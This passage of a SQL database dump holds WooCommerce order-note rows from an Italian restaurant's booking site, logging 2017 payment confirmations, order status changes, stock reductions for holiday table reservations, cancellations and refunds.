a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(348,380,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 14:17:34','2017-04-13 12:17:34','Magazzino dell\'elemento pasqua2017-2pax ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(349,381,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 15:10:59','2017-04-13 13:10:59','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(350,381,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 15:10:59','2017-04-13 13:10:59','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(351,381,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-13 15:11:00','2017-04-13 13:11:00','Magazzino dell\'elemento pasquetta2017-7pax ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(352,382,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 10:53:12','2017-04-14 08:53:12','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(353,382,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 10:53:12','2017-04-14 08:53:12','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(354,382,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 10:53:14','2017-04-14 08:53:14','Magazzino dell\'elemento pasquetta2017-4pax ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(355,383,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 11:17:46','2017-04-14 09:17:46','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(356,383,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 11:17:46','2017-04-14 09:17:46','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(357,383,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 11:17:48','2017-04-14 09:17:48','Magazzino dell\'elemento pasqua2017-2pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(358,384,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 14:17:07','2017-04-14 12:17:07','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(359,384,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 14:17:07','2017-04-14 12:17:07','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(360,384,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 14:17:08','2017-04-14 12:17:08','Magazzino dell\'elemento pasquetta2017-4pax ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(361,385,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 19:35:51','2017-04-14 17:35:51','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(362,385,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 19:35:51','2017-04-14 17:35:51','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(363,385,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 19:35:52','2017-04-14 17:35:52','Magazzino dell\'elemento pasquetta2017-6pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(364,386,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 21:36:46','2017-04-14 19:36:46','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(365,386,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 21:36:46','2017-04-14 19:36:46','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(366,386,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-14 21:36:47','2017-04-14 19:36:47','Magazzino dell\'elemento pasqua2017-5pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(367,387,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-15 11:13:12','2017-04-15 09:13:12','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(368,387,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-15 11:13:12','2017-04-15 09:13:12','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(369,387,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-04-15 11:13:14','2017-04-15 09:13:14','Magazzino dell\'elemento pasqua2017-7pax ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(433,487,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-07-27 16:25:24','2017-07-27 14:25:24','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(434,487,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-07-27 16:25:29','2017-07-27 14:25:29','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(435,487,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-07-27 16:25:35','2017-07-27 14:25:35','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(436,490,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-07-31 11:16:57','2017-07-31 09:16:57','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(437,490,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-07-31 11:17:02','2017-07-31 09:17:02','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(438,489,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-07-31 11:38:14','2017-07-31 09:38:14','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(439,492,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-08-11 21:49:01','2017-08-11 19:49:01','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(440,492,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-08-11 21:49:05','2017-08-11 19:49:05','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(441,492,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-08-11 21:50:17','2017-08-11 19:50:17','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(442,494,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-08-30 09:39:35','2017-08-30 07:39:35','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(443,494,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-08-30 09:39:38','2017-08-30 07:39:38','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(444,494,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-08-30 09:41:55','2017-08-30 07:41:55','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(450,496,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-10-11 10:01:21','2017-10-11 08:01:21','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(451,496,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-10-11 10:01:26','2017-10-11 08:01:26','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(452,496,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-10-11 10:02:40','2017-10-11 08:02:40','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(453,525,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-11-21 14:02:48','2017-11-21 13:02:48','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(454,525,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-11-21 14:02:53','2017-11-21 13:02:53','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(455,527,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-11-29 14:40:37','2017-11-29 13:40:37','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(456,535,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-02 13:19:32','2017-12-02 12:19:32','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(457,536,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-02 13:45:17','2017-12-02 12:45:17','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(458,536,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-02 13:45:18','2017-12-02 12:45:18','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(459,536,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-02 13:45:18','2017-12-02 12:45:18','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone (tavolox2) ridotto da 12 a 11.',0,'1','WooCommerce','order_note',0,0),(460,537,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-03 09:11:47','2017-12-03 08:11:47','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(461,537,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-03 09:11:49','2017-12-03 08:11:49','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(462,537,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-03 09:11:49','2017-12-03 08:11:49','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 12 a 11.',0,'1','WooCommerce','order_note',0,0),(463,538,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-03 09:54:31','2017-12-03 08:54:31','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(464,538,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-03 09:54:32','2017-12-03 08:54:32','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(465,538,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-03 09:54:32','2017-12-03 08:54:32','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 11 a 10.',0,'1','WooCommerce','order_note',0,0),(466,539,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-03 10:50:26','2017-12-03 09:50:26','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(467,539,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-03 10:50:28','2017-12-03 09:50:28','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(468,539,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-03 10:50:28','2017-12-03 09:50:28','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 10 a 9.',0,'1','WooCommerce','order_note',0,0),(469,540,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-04 10:16:52','2017-12-04 09:16:52','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(470,540,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-04 10:16:53','2017-12-04 09:16:53','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(471,540,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-04 10:16:53','2017-12-04 09:16:53','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Capodanno 2018 (tavolox4) ridotto da 5 a 4.',0,'1','WooCommerce','order_note',0,0),(472,536,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-05 12:38:36','2017-12-05 11:38:36','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(473,542,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-06 08:49:36','2017-12-06 07:49:36','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(474,542,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-06 08:49:38','2017-12-06 07:49:38','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(475,542,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-06 08:49:38','2017-12-06 07:49:38','Magazzino dell\'elemento Prenotazione Tavolo per 6 Persone - Capodanno 2018 (tavolox6) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(476,543,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-06 08:53:39','2017-12-06 07:53:39','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(477,543,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-06 08:53:40','2017-12-06 07:53:40','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(478,543,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-06 08:53:40','2017-12-06 07:53:40','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Capodanno 2018 (tavolox4) ridotto da 4 a 3.',0,'1','WooCommerce','order_note',0,0),(479,544,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-07 20:08:34','2017-12-07 19:08:34','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(480,544,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-07 20:08:36','2017-12-07 19:08:36','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(481,544,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-07 20:08:36','2017-12-07 19:08:36','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 9 a 8.',0,'1','WooCommerce','order_note',0,0),(482,545,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-09 18:33:15','2017-12-09 17:33:15','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(483,545,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-09 18:33:17','2017-12-09 17:33:17','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(484,545,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-09 18:33:17','2017-12-09 17:33:17','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Capodanno 2018 (tavolox4) ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(485,546,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-09 23:18:19','2017-12-09 22:18:19','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(486,546,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-09 23:18:20','2017-12-09 22:18:20','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(487,546,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-09 23:18:20','2017-12-09 22:18:20','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Capodanno 2018 (tavolox4) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(488,549,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-11 19:37:30','2017-12-11 18:37:30','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(489,552,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-11 23:01:48','2017-12-11 22:01:48','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(490,552,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-11 23:01:49','2017-12-11 22:01:49','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(491,552,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-11 23:01:49','2017-12-11 22:01:49','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 8 a 7.',0,'1','WooCommerce','order_note',0,0),(492,553,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-12 13:32:06','2017-12-12 12:32:06','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(493,553,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-12 13:32:08','2017-12-12 12:32:08','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(494,553,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-12 13:32:08','2017-12-12 12:32:08','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 7 a 6.',0,'1','WooCommerce','order_note',0,0),(495,553,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-12 13:32:08','2017-12-12 12:32:08','Magazzino dell\'elemento Prenotazione Tavolo per 3 Persone - Capodanno 2018 (tavolox3) ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(496,555,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-14 14:20:45','2017-12-14 13:20:45','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(497,555,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-14 14:20:50','2017-12-14 13:20:50','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(498,555,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-14 14:21:40','2017-12-14 13:21:40','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(499,557,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-16 23:11:57','2017-12-16 22:11:57','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(500,557,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-16 23:11:59','2017-12-16 22:11:59','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(501,557,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-16 23:11:59','2017-12-16 22:11:59','Magazzino dell\'elemento Prenotazione Tavolo per 6 Persone - Capodanno 2018 (tavolox6) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(502,558,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-17 12:35:26','2017-12-17 11:35:26','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(503,558,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-17 12:35:29','2017-12-17 11:35:29','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(504,558,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-17 12:35:29','2017-12-17 11:35:29','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 6 a 5.',0,'1','WooCommerce','order_note',0,0),(505,559,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-17 21:14:40','2017-12-17 20:14:40','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(506,559,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-17 21:14:42','2017-12-17 20:14:42','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(507,559,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-17 21:14:42','2017-12-17 20:14:42','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 5 a 4.',0,'1','WooCommerce','order_note',0,0),(508,560,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-18 11:21:40','2017-12-18 10:21:40','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(509,560,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-18 11:21:45','2017-12-18 10:21:45','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(510,562,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-18 14:10:03','2017-12-18 13:10:03','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(511,562,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-18 14:10:05','2017-12-18 13:10:05','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(512,562,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-18 14:10:05','2017-12-18 13:10:05','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Capodanno 2018 (tavolox4) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(513,563,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-18 21:50:27','2017-12-18 20:50:27','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(514,564,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-18 22:38:38','2017-12-18 21:38:38','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(515,565,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 11:33:35','2017-12-19 10:33:35','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(516,565,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 11:33:37','2017-12-19 10:33:37','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(517,565,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 11:33:37','2017-12-19 10:33:37','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 4 a 3.',0,'1','WooCommerce','order_note',0,0),(518,567,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 15:06:17','2017-12-19 14:06:17','Ordine cancellato dal cliente. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(519,567,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 15:06:17','2017-12-19 14:06:17','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(520,567,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 15:06:18','2017-12-19 14:06:18','Lo stato dell\'ordine è cambiato da Cancellato a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(521,567,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 15:06:18','2017-12-19 14:06:18','Magazzino dell\'elemento Prenotazione Tavolo per 3 Persone - Capodanno 2018 (tavolox3) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(522,566,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 15:32:46','2017-12-19 14:32:46','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(523,568,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 15:38:50','2017-12-19 14:38:50','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(524,568,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 15:38:52','2017-12-19 14:38:52','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(525,568,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 15:38:52','2017-12-19 14:38:52','Magazzino dell\'elemento Prenotazione Tavolo per 6 Persone - Capodanno 2018 (tavolox6) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(526,567,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 15:41:28','2017-12-19 14:41:28','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(527,570,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 16:59:05','2017-12-19 15:59:05','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(528,570,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 16:59:11','2017-12-19 15:59:11','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(529,572,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 19:32:16','2017-12-19 18:32:16','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(530,573,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 22:23:27','2017-12-19 21:23:27','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(531,573,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 22:23:29','2017-12-19 21:23:29','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(532,573,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-19 22:23:29','2017-12-19 21:23:29','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 3 a 2.',0,'1','WooCommerce','order_note',0,0),(534,568,'magnaromagna','webmaster@baldisserri.com','','','2017-12-19 22:32:15','2017-12-19 21:32:15','Stato dell\'ordine cambiato tramite modifica di massa: Lo stato dell\'ordine è cambiato da Completato a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(535,575,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-20 18:13:48','2017-12-20 17:13:48','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(536,575,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-20 18:13:50','2017-12-20 17:13:50','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(537,575,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-20 18:13:50','2017-12-20 17:13:50','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 2 a 1.',0,'1','WooCommerce','order_note',0,0),(538,576,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-21 12:17:09','2017-12-21 11:17:09','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(539,576,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-21 12:17:13','2017-12-21 11:17:13','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(540,576,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-21 12:17:14','2017-12-21 11:17:14','Lo stato dell\'ordine è cambiato da In lavorazione a Completato.',0,'1','WooCommerce','order_note',0,0),(541,546,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-22 13:40:11','2017-12-22 12:40:11','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(542,579,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-23 19:08:11','2017-12-23 18:08:11','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(543,579,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-23 19:08:12','2017-12-23 18:08:12','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(544,579,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-23 19:08:12','2017-12-23 18:08:12','Magazzino dell\'elemento Prenotazione Tavolo per 2 Persone - Capodanno 2018 (tavolox2) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(545,579,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-23 19:08:13','2017-12-23 18:08:13','Magazzino dell\'elemento Prenotazione Tavolo per 4 Persone - Capodanno 2018 (tavolox4) ridotto da 1 a 0.',0,'1','WooCommerce','order_note',0,0),(546,580,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-27 17:18:04','2017-12-27 16:18:04','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(547,580,'WooCommerce','woocommerce@www.ristorantesolymar.it','','','2017-12-27 17:18:08','2017-12-27 16:18:08','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In 